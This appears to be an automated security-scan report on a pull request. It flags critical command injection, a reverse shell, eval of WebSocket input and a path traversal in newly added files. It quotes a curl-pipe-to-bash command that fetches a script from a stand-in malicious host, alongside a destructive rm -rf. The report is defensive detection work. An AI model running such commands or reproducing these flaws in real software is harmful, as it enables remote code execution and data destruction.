added #13
ZeroPath AI Staging / Security Check
failed
Nov 27, 2025 in 0s
Scan completed
Blocking issue(s) found.
Details
❌ Possible security or compliance issues detected. Reviewed everything up to ea24d94.
The following issues were found:
- Command Injection
  - Location: cli/index.js:1-18
  - Score: CRITICAL (100.0)
  - Description: Arbitrary shell execution and execution of a remote script. The code interpolates untrusted process.argv[2] into a shell command string and passes it to child_process.exec. Additionally it unconditionally runs `curl http://malicious.example.com/install.sh | bash` and a destructive `rm -rf` as part of the same command pipeline. An attacker-controlled argv can inject shell metacharacters to execute arbitrary commands; the curl|bash pattern executes remote code immediately.
  - Link to UI: https://staging.branch.zeropath.com/app/issues/98a123c9-3b4d-48f5-876e-51d8904105cd
- Remote Code Execution (RCE)
  - Location: stdin/index.js:1-12
  - Score: CRITICAL (100.0)
  - Description: Immediate execution of a reverse shell command via child_process.exec with a hardcoded payload that opens a connection to an attacker-controlled host. This grants remote shell access and full control as the process user.
  - Link to UI: https://staging.branch.zeropath.com/app/issues/e45891ac-9e1b-4a9d-b756-e71b75143910
- Remote Code Execution (RCE)
  - Location: ws/index.js:1-12
  - Score: CRITICAL (100.0)
  - Description: Remote code execution via eval of untrusted WebSocket messages. Incoming messages are passed directly to eval(msg) and executed in server context, allowing any connected client to execute arbitrary JavaScript with application privileges.
  - Link to UI: https://staging.branch.zeropath.com/app/issues/51db9a27-9abf-4430-9876-e5715029491c
- Path Traversal
  - Location: disk/index.js:1-17
  - Score: MEDIUM (73.0)
  - Description: File disclosure / path traversal and symlink escape risk. The endpoint reads req.query.file and resolves it against __dirname, then uses a startsWith check to enforce containment. This exposes arbitrary files under the application dir; the startsWith containment check is brittle and can be bypassed using symlinks or platform path nuances, potentially disclosing sensitive files (configs, keys, .env).
  - Link to UI: https://staging.branch.zeropath.com/app/issues/0a746183-e3a0-431d-8875-07361472320b
Security Overview
- 🔎 Scanned files: 5 changed file(s)
- 🔗 Scan Link: https://staging.branch.zeropath.com/app/repositories/3d073d9b-c32a-449c-bae6-4a30e267e43a?scanId=0102905b-0807-48f6-a72a-f080cdcaab8e&codeScanTypes=PrScan&tab=issues
Detected Code Changes
| Change Type | Relevant files |
|---|---|
| Other | ► cli/index.js File creation ► disk/index.js File creation ► package.json File creation ► stdin/index.js File creation ► ws/index.js File creation |
Reply to this PR with @zeropath-ai followed by a description of what change you want and we'll auto-submit a change to this PR to implement it.